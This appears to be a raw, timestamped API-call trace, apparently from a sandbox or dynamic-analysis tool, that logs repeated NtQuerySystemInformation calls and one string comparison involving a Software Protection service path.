NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0272.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0272.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0272.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0272.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x50, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.656] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc08, Length=0x50, ResultLength=0x0) [0272.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0272.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.664] 